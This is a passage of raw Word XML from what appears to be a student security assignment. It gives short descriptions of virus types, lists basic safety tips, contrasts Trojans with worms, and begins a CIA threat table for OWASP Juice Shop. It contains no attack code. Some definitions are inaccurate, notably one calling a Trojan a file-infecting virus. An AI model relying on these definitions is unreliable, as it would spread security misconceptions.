    <w:p w14:paraId="64FD348A" w14:textId="47DD93B0" w:rsidR="00D0186C" w:rsidRDefault="00D0186C" w:rsidP="00D0186C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0186C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multipartite Virus</w:t>
      </w:r>
      <w:r w:rsidR="00283E33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A779996" w14:textId="4B071745" w:rsidR="00283E33" w:rsidRPr="00283E33" w:rsidRDefault="00283E33" w:rsidP="00283E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This virus remains in the computer’s memory and try to spread to the other hard drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB53F5" w14:textId="71EB903E" w:rsidR="00556CE9" w:rsidRDefault="00D0186C" w:rsidP="00556CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0186C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Direct Action</w:t>
      </w:r>
      <w:r w:rsidR="00283E33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509854B" w14:textId="2984D30F" w:rsidR="00556CE9" w:rsidRPr="00556CE9" w:rsidRDefault="00556CE9" w:rsidP="00556CE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This type is very dangerous as it can alter/delete all the files/folders that are in the autoexec.bat. It can also damage the memory and the system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3F7EE" w14:textId="131C0E7C" w:rsidR="00556CE9" w:rsidRDefault="00556CE9" w:rsidP="00556CE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Scripting Virus</w:t>
      </w:r>
      <w:r w:rsidR="00A41477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00556CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA6D79" w14:textId="6D2BD1F8" w:rsidR="00556CE9" w:rsidRDefault="00556CE9" w:rsidP="00556CE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This virus attacks the websites and inject malicious codes in there which can change the normal behavior of the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD417F" w14:textId="36647035" w:rsidR="00A41477" w:rsidRDefault="00A41477" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network virus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522FAD3" w14:textId="56AC358C" w:rsidR="00A41477" w:rsidRPr="00556CE9" w:rsidRDefault="00A41477" w:rsidP="00556CE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network virus is too dangerous as it could affect any connected device in a single network. They are difficult to discover. They can hide in any devise and go to other connected device easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533F9606" w14:textId="38A93A81" w:rsidR="00A41477" w:rsidRPr="00283E33" w:rsidRDefault="00A41477" w:rsidP="00A41477">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FE0FA" w14:textId="211B6602" w:rsidR="007F2BF7" w:rsidRDefault="00A41477" w:rsidP="007F2BF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How to stay safe?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33252F06" w14:textId="39FB0FDE" w:rsidR="00A41477" w:rsidRDefault="00A41477" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do not open attachments that come from untrusted emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C9562" w14:textId="0E386842" w:rsidR="00A41477" w:rsidRDefault="00806448" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Install a good antivirus and keep it updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25046633" w14:textId="0E29E6FF" w:rsidR="00806448" w:rsidRDefault="00806448" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use malwares removal tools for your browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F7B55" w14:textId="0CFE4C73" w:rsidR="00806448" w:rsidRDefault="00806448" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement Host/Network Intrusion and Detecting/Preventing systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C78C3B" w14:textId="0D4FBD46" w:rsidR="008F4E24" w:rsidRPr="00A41477" w:rsidRDefault="008F4E24" w:rsidP="00A41477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Do not click Pop-ups on websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDC698" w14:textId="08EA03C6" w:rsidR="00AB52F3" w:rsidRDefault="00AB52F3" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149F85D8" w14:textId="16AA20C1" w:rsidR="006D41D6" w:rsidRDefault="00806448" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Torjan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> horse is a virus that fakes the purpose of it to get onto as many files as possible and infect the. </w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whereas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> worm</w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not a virus as </w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not require </w:t>
      </w:r>
      <w:r w:rsidR="008F4E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>human interaction to spread and execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B751E0" w14:textId="18A0E31A" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F351FE1" w14:textId="6414E6DC" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E963F6" w14:textId="64AC8644" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A7DDDB" w14:textId="47F6FDC3" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69720E8F" w14:textId="57A5734B" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0144DAF1" w14:textId="49900918" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B9CABE" w14:textId="33A3A4FB" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FCEF60" w14:textId="2D780693" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A100ED" w14:textId="6BAD87E5" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B434982" w14:textId="5F680107" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FC4CAD" w14:textId="7116483C" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDE1942" w14:textId="297BF5BC" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138EF169" w14:textId="6DD000E4" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBF0A0F" w14:textId="3EF1DC8F" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA71E22" w14:textId="293BE36E" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7990CE12" w14:textId="433E83F2" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5058BB0C" w14:textId="770C96EB" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3906B43A" w14:textId="513CDC7A" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E31222" w14:textId="703B65B6" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B9DC46" w14:textId="4244254C" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B57B378" w14:textId="7E8CDAC8" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB222D6" w14:textId="58EF796E" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76125D61" w14:textId="39954C13" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9435DE" w14:textId="63E34BA1" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D9525B" w14:textId="293931FF" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123FBB50" w14:textId="32019DF7" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0315E586" w14:textId="2A93E93A" w:rsidR="00523F8D" w:rsidRDefault="00523F8D" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This table illustrates the CIA matrix and examples for each side for Juice Shop website and most probably also for every website on the internet. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-998" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1621"/>
        <w:gridCol w:w="2683"/>
        <w:gridCol w:w="1833"/>
        <w:gridCol w:w="5062"/>
      </w:tblGrid>
      <w:tr w:rsidR="000752C7" w14:paraId="3820588A" w14:textId="77777777" w:rsidTr="00CA7170">
        <w:trPr>
          <w:trHeight w:val="841"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5B88B1E9" w14:textId="7AEC2EC3"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Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="261E3108" w14:textId="5F894915" w:rsidR="000752C7" w:rsidRPr="00CA7170" w:rsidRDefault="000752C7" w:rsidP="00CA7170">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Information Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6F4BBD45" w14:textId="2F315943"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Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47A8F734" w14:textId="18C86B47" w:rsidR="000752C7" w:rsidRPr="00CA7170" w:rsidRDefault="000752C7" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA7170">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Relevance for Example Company</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E579818" w14:textId="71728BFC" w:rsidR="006D41D6" w:rsidRDefault="006D41D6" w:rsidP="00AB52F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="11199" w:type="dxa"/>
        <w:tblInd w:w="-998" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="000752C7" w:rsidRPr="00CA7170" w14:paraId="28F9371D" w14:textId="77777777" w:rsidTr="00DA34CB">
        <w:trPr>
          <w:trHeight w:val="824"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0B22567C" w14:textId="735AE452" w:rsidR="000752C7" w:rsidRPr="00CA7170" w:rsidRDefault="000752C7" w:rsidP="00AB52F3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA34CB">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3F5C78D0" w14:textId="193195F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59938C04" w14:textId="3C726E38"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isclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
